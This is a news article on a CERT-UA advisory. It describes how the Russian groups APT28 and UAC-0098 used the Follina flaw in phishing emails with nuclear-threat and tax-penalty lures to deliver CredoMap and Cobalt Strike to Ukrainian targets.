The Ukrainian national cybersecurity team has released a threat advisory regarding a couple of Russian threat groups exploiting the Follina critical flaw for executing their phishing campaigns.
Based on reports, the Russian groups spotted by researchers retargeting Ukraine are the APT28 and UAC-0098. One of the two hacker groups launched Cobalt Strike beacons and the CredoMap malware.
The Russian APT actors called APT28 (Fancy Bear) were spotted spreading emails containing the malicious document that attempted to exploit the fear of the Ukrainians regarding a potential nuclear bomb attack from Russia.
The RTF document titled “Nuclear Terrorism A Very Real Threat” was used by the hackers in the recent campaign to abuse the Follina flaw to download and run the CredoMap malware on a targeted device.
The CredoMap malware is disseminated to targeted victims to harvest information saved in several web browsers such as Chrome, Microsoft Edge, and Mozilla Firefox. The researchers also noted that the adversaries collect even cookies saved in these browsers.
Hackers have still exploited the Follina flaw despite the recent release of a patch for it.
CERT-UA also discovered another threat group called UAC-0098, which conducts a separate threat campaign using the Follina critical vulnerability for their attacks.
The adversaries use a DOCX coded as “Imposition of penalties[.]docx”, and the actors from a remote resource acquire a Cobalt Strike Beacon payload. The remote resource has the latest compilation data last June.
The emails deployed by the hackers impersonated a State Tax Service in Ukraine. The subject of the phishing emails is the non-payment of tax due to the war. Since most of the citizens of Ukraine are affected by the Russian invasion, they are potential targets for the campaign.
Russian hackers have been eyeing all Ukrainian entities since the war began, and the use of the latest security trends and exploits showed that they are constantly making efforts to make their attacks more efficient.
Cybersecurity experts expect that there will be more attacks from Russian state-sponsored hacker groups soon. CERT-UA suggests that Ukrainians should stay alert against malware-laden threats.